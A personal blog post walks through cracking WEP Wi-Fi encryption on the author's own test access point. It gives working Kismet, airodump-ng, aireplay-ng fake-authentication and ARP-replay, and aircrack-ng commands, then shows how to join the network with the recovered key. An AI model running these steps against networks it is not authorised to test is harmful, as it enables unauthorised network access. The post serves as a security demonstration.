Receive/Transmit

Its a well known fact that WEP is fundamentally broken, and its also a well known fact that it can be cracked very easily. Unfortunately it doesn’t seem to be well known enough, as I frequently come across friends who only use WEP encryption on their wireless. The best way to convince them to change it is to demonstrate how easy it is to break, which is what this post is about. This post is for my benefit as much as anyone else’s. I realise its been done to death and there’s hundreds of tutorials already out there, but whenever I need to do this I can never remember the commands and the stuff online never seems to be quite correct or is slightly out of date regarding command switches etc.

I’ll be using a standard laptop running BackTrack 4 R1, with an Alfa USB wireless adaptor (AWUS036H). Using a well-tested adaptor such as this will solve a lot of headaches as it is literally plug and play.

I’ll split this into four steps: finding the target; performing the attack; cracking the key; and connecting to the network. For the purposes of this I’ve set up an access point running 64 bit WEP so the capturing goes a little faster. I’m going to skim over a lot of the theory since this is available elsewhere in much better detail than I’ll be able to go into.

Finding a target

This bit is pretty easy. Boot your BackTrack live cd, type ‘startx’ to get into the GUI and then open a shell window. The tool we’ll use to scope out available APs is called Kismet. Before we run this we need to identify our wireless interface but running iwconfig. In my case the interface is called ‘wlan0′.

Then we start Kismet. It has a server and client component, which you can run separately. If you run just the client and the server isn’t running, it will prompt you to start it anyway. I’ll use the option of running the server separately:

kismet_server

Then in a new shell run the client:

kismet

The client will warn you that you are running as root, and then ask you to choose a capture interface since none is defined. This is the interface you found from iwconfig, type in its name exactly as it was written. If you get an error you might be using the wrong interface, so keep trying wireless adaptors until you find the one that works. Once Kismet is running we can see a list of the available wireless neworks plus a ton of information. There is a lot of stuff to explore, but the info we are concerned with is the bssid, the essid and the channel it is on. Below we can see my test network as seen by Kismet. Feel free to try the other menus and options to get a handle for the tool.

From this then we can see the info we need to make a note of:

• essid: test
• bssid: 00:14:6C:6E:B4:7C
• channel: 11

Performing the attack

To crack WEP we need to capture a special kind of packet, known as an Initialisation Vector. Once we have enough of these we can attempt to crack the key. If you just set off something to monitor you’ll find that these naturally occur, but to get the amount required for cracking we can do a few tricks to speed up the process. We are going to send packets to the AP which will cause it to send out IVs at a much faster rate than normal. I’ll also show you how to fake an association with the AP from the laptop – usually you can use already connected clients to perform the attack but if there aren’t any this is a handy trick.

If at any point during this part things don’t work or you get errors, I’ve found the best way is to just reset the wireless adapter by disconnecting/reconnecting it.

First close Kismet so it doesn’t interfere, and run the following command in a shell window to start the IV capture:

airodump-ng --channel 11 --bssid 00:14:6C:6E:B4:7C --write /testcap --ivs wlan0

–channel 11 means capture on channel 11
–bssid 00:14:6C:6E:B4:7C means capture traffic from the given bssid
--write /testcap is where we want the output saving
–ivs means only capture packets containing IVs
wlan0 is the interface to capture on

You’ll get a screen with some stats, but assuming there are no clients connected it won’t show much traffic yet. Now we are going to set off an association attack against the AP in another shell window. This will cause our laptop to associate with the AP so we can use it to generate IVs:

aireplay-ng -1 0 -e test -a 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0

--1 0 use attack 1 (fake auth) with 0 delay, or only associate once
-e test is the target essid of the fake auth
-a 00:14:6C:BE:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the mac address of the wireless card (got via ifconfig, need to run ifup wlan0 if it doesn’t show up)
wlan0 is once again the source interface

So now we are capturing traffic and have a client to use for the attack. The next command is:

aireplay-ng -3 -b 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0

--3 use attack 3 (ARP replay)
-b 00:14:6C:BE:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the mac address of the wireless card
wlan0 is once again the source interface

Eventually you should see some ARP replies (it may take a while to start). Now if you look in the airodump window, we are watching for the column labelled #Data. This is the number of packets we’ve captured, which all happen to be IVs due to our airodump filters. The amount you need to perform a crack may vary. I find the best approach is to try to crack every 50,000, which leads us onto the next part.

Cracking the key

Really easy this bit, just run the following command:

aircrack-ng -s /testcap-01.ivs

If it takes more that a couple of seconds, wait until you have more IVs. Now we have all the info we need to connect to the network

Connecting to the network

Nothing surprising here, just using the info we already have to get on the network.

ifdown wlan0
iwconfig wlan0 mode managed
iwconfig wlan0 channel 11
iwconfig wlan0 essid test
iwconfig wlan0 key 1b9dda483d
ifup wlan0

At this point you should get an IP via DHCP, if not try running “dhcpd wlan0“. If you do this a few times you can get pretty fast at it, and 5-10 minutes will be all you’ll need to perform the full attack.